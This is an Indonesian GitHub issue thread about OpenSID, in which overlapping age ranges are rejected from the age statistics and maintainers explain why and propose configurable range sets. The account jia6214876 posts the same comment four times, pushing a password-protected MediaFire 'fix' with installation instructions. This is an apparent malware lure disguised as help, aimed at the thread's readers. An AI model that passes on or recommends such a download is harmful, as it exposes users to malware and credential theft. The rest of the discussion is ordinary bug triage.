### ISSUE TITLE
Bug/error: RENTANG UMUR YANG BARU DI TAMBAHKAN TIDAK MUNCUL PADA STATISTIK UMUR (RENTANG)

### ISSUE THREAD

**Issue by pujocahyono** [OpenSID/OpenSID#8391]
### Jelaskan error yg dialami

RENTANG UMUR YANG BARU DI TAMBAHKAN TIDAK MUNCUL PADA STATISTIK UMUR (RENTANG). SETELAH DI LAKUKAN PENAMBAHAN LAGI DENGAN RENTANG UMUR YANG SAMA HASILNYA GAGAL KARENA DATA SUDAH ADA. NAMUN DI STATISTIK TIDAK MUNCUL.
![Cuplikan layar 2024-08-27 112246](https://github.com/user-attachments/assets/8d85bdc6-d1d9-47b9-bfc1-5081c68103f0)

SAAT MENAMBAHKAN DENGAN RENTANG YANG SAMA HASILNYA:
![Cuplikan layar 2024-08-27 112304](https://github.com/user-attachments/assets/08ece3a3-d080-402a-9bce-1c529e701d39)

### Cara untuk mereplikasi errornya

1. MENU STATISTIK
2. STATISTIK KEPENDUDUKAN
3. UMUR (RENTANG)
4. TAMBAHKAN RENTANG UMUR

### Hasil yg diharapkan

NORMAL

### Tangkapan layar dan log error

SEPERTI DI ATAS

### Rilis Versi OpenSID

Rilis Premium

### Versi OpenSID

2408.0.3

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eddieridwan** [comment]
@andifahruddinakas pesannya perlu diperjelas. Sebut bahwa masing2 rentang tidak boleh berhimpitan/tumpang tindih.

**Comment by andifahruddinakas** [comment]
pak @pujocahyono, terlihat data yang akan ditambahkan adalah 18 sampai 56 tahun, sedangkan pada data sudah tersedia retang 15 s/d 19 tahun yang mewakili 18 thn dan mungkin 50 s/d ??? tahun yg mewakili 56 tahun.

Untuk perbaikan yakni, notifikasi diperjeas sbb:
![image](https://github.com/user-attachments/assets/23c7239f-b3ba-42b1-8081-6e5eec2997ba)

![image](https://github.com/user-attachments/assets/657353b9-20b5-4bb7-8e17-cac86eab8356)

Sudah disesuaikan melalui perbaikan susulan dicommit https://github.com/OpenSID/premium/commit/33307b3e461171ce4085f9b951c422daf909e62f

**Comment by pujocahyono** [comment]
> pak @pujocahyono, terlihat data yang akan ditambahkan adalah 18 sampai 56 tahun, sedangkan pada data sudah tersedia retang 15 s/d 19 tahun yang mewakili 18 thn dan mungkin 50 s/d ??? tahun yg mewakili 56 tahun.
> 
> Untuk perbaikan yakni, notifikasi diperjeas sbb: ![image](https://private-user-images.githubusercontent.com/57283157/361810024-23c7239f-b3ba-42b1-8081-6e5eec2997ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjM5NTYsIm5iZiI6MTcyNDc2MzY1NiwicGF0aCI6Ii81NzI4MzE1Ny8zNjE4MTAwMjQtMjNjNzIzOWYtYjNiYS00MmIxLTgwODEtNmU1ZWVjMjk5N2JhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMDA1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTJmYjY5ZTZiYTYyYzIxZjU5NmRmZmE3MGZjMmEyMzk0YjIzMTdhMDg1NDgyYjg1ZTcyMzAyOTkxNjhlMWU2M2QmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.uD5bzfPdV79-W8c5Z9ylcgdCWv4yrLrs2GUOxs_T9so)
> 
> ![image](https://private-user-images.githubusercontent.com/57283157/361810135-657353b9-20b5-4bb7-8e17-cac86eab8356.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjM5NTYsIm5iZiI6MTcyNDc2MzY1NiwicGF0aCI6Ii81NzI4MzE1Ny8zNjE4MTAxMzUtNjU3MzUzYjktMjBiNS00YmI3LThlMTctY2FjODZlYWI4MzU2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMDA1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTdkNWViMDE5OTUwZjk4YmZhZjgxNzcwMzY2ODM1YjQwYjkxOWRkMDg3N2ZiNjU4ZmEyMzNjYTZlYTNlNTcxYzgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.K3SgLpXd_L1VVFJW3xevxYkg2Qy_bM4UjHGdG__7q48)
> 
> Sudah disesuaikan melalui perbaikan susulan dicommit https://github.com/OpenSID/premium/commit/33307b3e461171ce4085f9b951c422daf909e62f

Di versi sebelumnya bisa pak @andifahruddinakas

**Comment by andifahruddinakas** [comment]
> > pak @pujocahyono, terlihat data yang akan ditambahkan adalah 18 sampai 56 tahun, sedangkan pada data sudah tersedia retang 15 s/d 19 tahun yang mewakili 18 thn dan mungkin 50 s/d ??? tahun yg mewakili 56 tahun.
> > 
> > Untuk perbaikan yakni, notifikasi diperjeas sbb: ![image](https://private-user-images.githubusercontent.com/57283157/361810024-23c7239f-b3ba-42b1-8081-6e5eec2997ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjM5NTYsIm5iZiI6MTcyNDc2MzY1NiwicGF0aCI6Ii81NzI4MzE1Ny8zNjE4MTAwMjQtMjNjNzIzOWYtYjNiYS00MmIxLTgwODEtNmU1ZWVjMjk5N2JhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMDA1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTJmYjY5ZTZiYTYyYzIxZjU5NmRmZmE3MGZjMmEyMzk0YjIzMTdhMDg1NDgyYjg1ZTcyMzAyOTkxNjhlMWU2M2QmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.uD5bzfPdV79-W8c5Z9ylcgdCWv4yrLrs2GUOxs_T9so)
> > 
> > ![image](https://private-user-images.githubusercontent.com/57283157/361810135-657353b9-20b5-4bb7-8e17-cac86eab8356.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjM5NTYsIm5iZiI6MTcyNDc2MzY1NiwicGF0aCI6Ii81NzI4MzE1Ny8zNjE4MTAxMzUtNjU3MzUzYjktMjBiNS00YmI3LThlMTctY2FjODZlYWI4MzU2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMDA1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTdkNWViMDE5OTUwZjk4YmZhZjgxNzcwMzY2ODM1YjQwYjkxOWRkMDg3N2ZiNjU4ZmEyMzNjYTZlYTNlNTcxYzgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.K3SgLpXd_L1VVFJW3xevxYkg2Qy_bM4UjHGdG__7q48)
> > 
> > Sudah disesuaikan melalui perbaikan susulan dicommit https://github.com/OpenSID/premium/commit/33307b3e461171ce4085f9b951c422daf909e62f
> 
> Di versi sebelumnya bisa pak @andifahruddinakas 

Iya, karena hal tsb hitungannya jd salah. Krn terhitung dimasing2 rentang umur untuk org yg sama.

**Comment by pujocahyono** [comment]
> > > pak @pujocahyono, terlihat data yang akan ditambahkan adalah 18 sampai 56 tahun, sedangkan pada data sudah tersedia retang 15 s/d 19 tahun yang mewakili 18 thn dan mungkin 50 s/d ??? tahun yg mewakili 56 tahun.
> > > Untuk perbaikan yakni, notifikasi diperjeas sbb: ![image](https://private-user-images.githubusercontent.com/57283157/361810024-23c7239f-b3ba-42b1-8081-6e5eec2997ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjM5NTYsIm5iZiI6MTcyNDc2MzY1NiwicGF0aCI6Ii81NzI4MzE1Ny8zNjE4MTAwMjQtMjNjNzIzOWYtYjNiYS00MmIxLTgwODEtNmU1ZWVjMjk5N2JhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMDA1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTJmYjY5ZTZiYTYyYzIxZjU5NmRmZmE3MGZjMmEyMzk0YjIzMTdhMDg1NDgyYjg1ZTcyMzAyOTkxNjhlMWU2M2QmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.uD5bzfPdV79-W8c5Z9ylcgdCWv4yrLrs2GUOxs_T9so)
> > > ![image](https://private-user-images.githubusercontent.com/57283157/361810135-657353b9-20b5-4bb7-8e17-cac86eab8356.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjM5NTYsIm5iZiI6MTcyNDc2MzY1NiwicGF0aCI6Ii81NzI4MzE1Ny8zNjE4MTAxMzUtNjU3MzUzYjktMjBiNS00YmI3LThlMTctY2FjODZlYWI4MzU2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMDA1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTdkNWViMDE5OTUwZjk4YmZhZjgxNzcwMzY2ODM1YjQwYjkxOWRkMDg3N2ZiNjU4ZmEyMzNjYTZlYTNlNTcxYzgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.K3SgLpXd_L1VVFJW3xevxYkg2Qy_bM4UjHGdG__7q48)
> > > Sudah disesuaikan melalui perbaikan susulan dicommit https://github.com/OpenSID/premium/commit/33307b3e461171ce4085f9b951c422daf909e62f
> > 
> > 
> > Di versi sebelumnya bisa pak @andifahruddinakas
> 
> Iya, karena hal tsb hitungannya jd salah. Krn terhitung dimasing2 rentang umur untuk org yg sama.

Artinya kita harus menghapus rentang tertentu untuk membuat rentang baru ya pak @andifahruddinakas ?
Misalnya : untuk kebutuhan website kita buat sbb:
0-4, 5-9, 10-14, 15-19, 20-24, dan seterusnya dengan rentang 5 tahun. Kemudian ada pendataan angkatan kerja dengan rentang 18-56 tahun, artinya kita harus menghapus rentang dari 15-19 sampai 55-59. Begitu kah?
Bukan kan ini cukup merepotkan jika harus membuat rentang yg sebelumnya di hapus.
Atau ada cara lain kah?

**Comment by andifahruddinakas** [comment]
> > > > pak @pujocahyono, terlihat data yang akan ditambahkan adalah 18 sampai 56 tahun, sedangkan pada data sudah tersedia retang 15 s/d 19 tahun yang mewakili 18 thn dan mungkin 50 s/d ??? tahun yg mewakili 56 tahun.
> > > > Untuk perbaikan yakni, notifikasi diperjeas sbb: ![image](https://private-user-images.githubusercontent.com/57283157/361810024-23c7239f-b3ba-42b1-8081-6e5eec2997ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjM5NTYsIm5iZiI6MTcyNDc2MzY1NiwicGF0aCI6Ii81NzI4MzE1Ny8zNjE4MTAwMjQtMjNjNzIzOWYtYjNiYS00MmIxLTgwODEtNmU1ZWVjMjk5N2JhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMDA1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTJmYjY5ZTZiYTYyYzIxZjU5NmRmZmE3MGZjMmEyMzk0YjIzMTdhMDg1NDgyYjg1ZTcyMzAyOTkxNjhlMWU2M2QmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.uD5bzfPdV79-W8c5Z9ylcgdCWv4yrLrs2GUOxs_T9so)
> > > > ![image](https://private-user-images.githubusercontent.com/57283157/361810135-657353b9-20b5-4bb7-8e17-cac86eab8356.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjM5NTYsIm5iZiI6MTcyNDc2MzY1NiwicGF0aCI6Ii81NzI4MzE1Ny8zNjE4MTAxMzUtNjU3MzUzYjktMjBiNS00YmI3LThlMTctY2FjODZlYWI4MzU2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMDA1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTdkNWViMDE5OTUwZjk4YmZhZjgxNzcwMzY2ODM1YjQwYjkxOWRkMDg3N2ZiNjU4ZmEyMzNjYTZlYTNlNTcxYzgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.K3SgLpXd_L1VVFJW3xevxYkg2Qy_bM4UjHGdG__7q48)
> > > > Sudah disesuaikan melalui perbaikan susulan dicommit https://github.com/OpenSID/premium/commit/33307b3e461171ce4085f9b951c422daf909e62f
> > > 
> > > 
> > > Di versi sebelumnya bisa pak @andifahruddinakas
> > 
> > Iya, karena hal tsb hitungannya jd salah. Krn terhitung dimasing2 rentang umur untuk org yg sama.
> 
> Artinya kita harus menghapus rentang tertentu untuk membuat rentang baru ya pak @andifahruddinakas ?
> Misalnya : untuk kebutuhan website kita buat sbb:
> 0-4, 5-9, 10-14, 15-19, 20-24, dan seterusnya dengan rentang 5 tahun. Kemudian ada pendataan angkatan kerja dengan rentang 18-56 tahun, artinya kita harus menghapus rentang dari 15-19 sampai 55-59. Begitu kah?
> Bukan kan ini cukup merepotkan jika harus membuat rentang yg sebelumnya di hapus.
> Atau ada cara lain kah?

Ya, untuk kondisi saat ini. Statistik umur pada OpenSID hanya mencakup 2 jenis umur saja. Yakni berdasarkan rentang dan kategorinya. Untuk kasus lain belum ada permintaan. Adapun cara lama dimana rentang umur boleh berhimpitan membuat  perhitungan statistik jd salah, krn kemungkinan besar akan ada penduduk yg terhitung 2 kali.

Pak @eddieridwan , mungkin bisa dibuat fungsi agar pengguna bisa menyesuikan kategori untuk umur ini. Dengan bawaan yg sdh ada yakni rentang dan kategori.

**Comment by pujocahyono** [comment]
![Screenshot_2024-08-27-20-18-16-642-edit_com android chrome](https://github.com/user-attachments/assets/7e6a0285-d334-44b1-9415-18e6e0d63f26)

Mungkin bisa d buat tombol **aktif & non aktif** pada kolom aksi. Untuk mempermudah pengguna agar tidak perlu menghapus.

**Comment by andifahruddinakas** [comment]
> ![Screenshot_2024-08-27-20-18-16-642-edit_com android chrome](https://private-user-images.githubusercontent.com/87228587/362105360-7e6a0285-d334-44b1-9415-18e6e0d63f26.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MTQ4MzMsIm5iZiI6MTcyNDgxNDUzMywicGF0aCI6Ii84NzIyODU4Ny8zNjIxMDUzNjAtN2U2YTAyODUtZDMzNC00NGIxLTk0MTUtMThlNmUwZDYzZjI2LmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDAzMDg1M1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQxNTY2YjQyZDA1NjI3NmRjODVjMGY3ZTliNWI5YzEzYWVmNzA0NTQzOGQ5ZjM3MWEwZmQ4ZDU5NjZjYjI0YjEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.x83hYSUwKbHLqpQGJmAaxpZ_iXLuFp-3kiAVWuF9dRU)
> 
> Mungkin bisa d buat tombol **aktif & non aktif** pada kolom aksi. Untuk mempermudah pengguna agar tidak perlu menghapus.

Silahkan buat issue terkait pemintaan fitur, jelaskan apa yang dibutuhkan.

**Comment by pujocahyono** [comment]
> > ![Screenshot_2024-08-27-20-18-16-642-edit_com android chrome](https://private-user-images.githubusercontent.com/87228587/362105360-7e6a0285-d334-44b1-9415-18e6e0d63f26.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MTQ4MzMsIm5iZiI6MTcyNDgxNDUzMywicGF0aCI6Ii84NzIyODU4Ny8zNjIxMDUzNjAtN2U2YTAyODUtZDMzNC00NGIxLTk0MTUtMThlNmUwZDYzZjI2LmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDAzMDg1M1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQxNTY2YjQyZDA1NjI3NmRjODVjMGY3ZTliNWI5YzEzYWVmNzA0NTQzOGQ5ZjM3MWEwZmQ4ZDU5NjZjYjI0YjEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.x83hYSUwKbHLqpQGJmAaxpZ_iXLuFp-3kiAVWuF9dRU)
> > Mungkin bisa d buat tombol **aktif & non aktif** pada kolom aksi. Untuk mempermudah pengguna agar tidak perlu menghapus.
> 
> Silahkan buat issue terkait pemintaan fitur, jelaskan apa yang dibutuhkan.

Baik pak

**Comment by eddieridwan** [comment]
> Pak @eddieridwan , mungkin bisa dibuat fungsi agar pengguna bisa menyesuikan kategori untuk umur ini. Dengan bawaan yg sdh ada yakni rentang dan kategori.

Saya kira usul yg baik. Sehingga nantinya pengguna dapat membuat beberapa kumpulan rentang umur sesuai kebutuhan. Misalnya:

1. Rentang umur sesuai kategori bawaan sistem (sesuai dengan kategori umur dari Dukcapil atau instansi pusat lainnya)
2. Rentang umur dengan tingkatan setiap 4 tahun
3. Rentang umur dengan tingkatan setiap 5 tahun
4. Rentang umur sesuai kategori yg berlaku di kabupaten ybs
5. dsbnya

Masing2 kumpulan rentang umur di atas bisa diberi nama, supaya jelas isinya (misalnya "Rentang per 5 Tahun", "Rentang BPS Kabupaten"). Masing2 rentang di dalam kumpulan rentang dapat diberi nama sendiri (seperti Balita, Anak, Dewasa, dll.)

Jadi default yg disediakan pada install awal adalah:

1. Rentang umur sesuai penkategorian instansi pusat (beri nama sesuai dengan instansinya). Tidak dapat diubah.
2. Rentang umur dengan tingkatan 5 tahun, yang disediakan sebagai contoh untuk dapat diubah sendiri oleh pengguna

Dan disediakan tombol untuk menambah/menghapus kumpulan rentang umur selain yg bawaan berdasarkan penkategorian instansi pusat.
